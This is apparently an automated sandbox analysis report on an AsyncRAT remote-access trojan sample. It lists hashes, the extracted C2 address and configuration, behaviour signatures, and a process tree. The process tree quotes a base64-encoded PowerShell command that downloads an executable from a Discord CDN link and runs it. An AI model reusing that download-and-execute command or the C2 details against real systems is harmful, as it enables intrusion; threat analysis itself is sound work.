asyncrat | a0dd0fd9b082e1e5c66861ab460fce6d9f50b4369def04da73841e5387606837

General

Target

1.exe
Size

5KB
MD5

c735194e98e65e8eef9f8ff0e7ebb438
SHA1

ac5045e63d0a25902f46639fbef893e490e99ae4
SHA256

a0dd0fd9b082e1e5c66861ab460fce6d9f50b4369def04da73841e5387606837
SHA512

c6fb11ef987ca0bd6787ab533aaf7fd82c6c7ea06aea9d5cde27f83864f2d418d037a761fbfed68e07a9ec5928eb2f8a77506c1f44467970dd88edce4a052c0a
SSDEEP

96:8G791ll3VI287thtvk+PuAYks9vk+Pf1cvHd3ojxrl:/91/33Y5vkCYlvkeCHdW

Score

10^/10

asyncrat system guard runtime rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1960-147-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

13 2284 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

1.exe1.exe

pid process

212 1.exe
4764 1.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

1.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation 1.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

1.exe1.exe

description pid process target process

PID 212 set thread context of 1960 212 1.exe RegAsm.exe
PID 4764 set thread context of 2536 4764 1.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2284 powershell.exe
2284 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exe1.exe1.exe

description pid process

Token: SeDebugPrivilege 2284 powershell.exe
Token: SeDebugPrivilege 212 1.exe
Token: SeDebugPrivilege 4764 1.exe

flow	pid	process
13	2284	powershell.exe

pid	process
212	1.exe
4764	1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	1.exe

description	pid	process	target process
PID 212 set thread context of 1960	212	1.exe	RegAsm.exe
PID 4764 set thread context of 2536	4764	1.exe	RegAsm.exe

pid	process
2284	powershell.exe
2284	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	212	1.exe
Token: SeDebugPrivilege	4764	1.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

1.exepowershell.exe1.exe1.exe

description	pid	process	target process
PID 1336 wrote to memory of 2284	1336	1.exe	powershell.exe
PID 1336 wrote to memory of 2284	1336	1.exe	powershell.exe
PID 2284 wrote to memory of 212	2284	powershell.exe	1.exe
PID 2284 wrote to memory of 212	2284	powershell.exe	1.exe
PID 2284 wrote to memory of 212	2284	powershell.exe	1.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 212 wrote to memory of 1960	212	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe
PID 4764 wrote to memory of 2536	4764	1.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAbgBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUANQA2ADAANAA2ADUANAA0ADQANgAyADIAMwAzADcAMAAvADEAMAA1ADUANgAwADQANwA3ADUAMAAwADMAMAA5ADkAMQA4ADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHAAZgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB3AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegB2AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQApADwAIwBuAGUAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGsAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBuAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAYQBjAHAAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284

C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:1960

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:2536

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
memory/212-144-0x0000000006E90000-0x0000000006F22000-memory.dmp

Filesize
584KB

Download
memory/212-143-0x0000000007290000-0x0000000007834000-memory.dmp

Filesize
5.6MB

Download
memory/212-137-0x0000000000000000-mapping.dmp

Download
memory/212-145-0x0000000006FE0000-0x000000000707C000-memory.dmp

Filesize
624KB

Download
memory/212-142-0x0000000000BE0000-0x0000000001A90000-memory.dmp

Filesize
14.7MB

Download
memory/1336-134-0x00007FFF68460000-0x00007FFF68F21000-memory.dmp

Filesize
10.8MB

Download
memory/1336-132-0x00000000005A0000-0x00000000005A8000-memory.dmp

Filesize
32KB

Download
memory/1960-146-0x0000000000000000-mapping.dmp

Download
memory/1960-147-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2284-141-0x00007FFF68460000-0x00007FFF68F21000-memory.dmp

Filesize
10.8MB

Download
memory/2284-135-0x0000015FA2E70000-0x0000015FA2E92000-memory.dmp

Filesize
136KB

Download
memory/2284-139-0x00007FFF68460000-0x00007FFF68F21000-memory.dmp

Filesize
10.8MB

Download
memory/2284-136-0x00007FFF68460000-0x00007FFF68F21000-memory.dmp

Filesize
10.8MB

Download
memory/2284-133-0x0000000000000000-mapping.dmp

Download
memory/2536-150-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing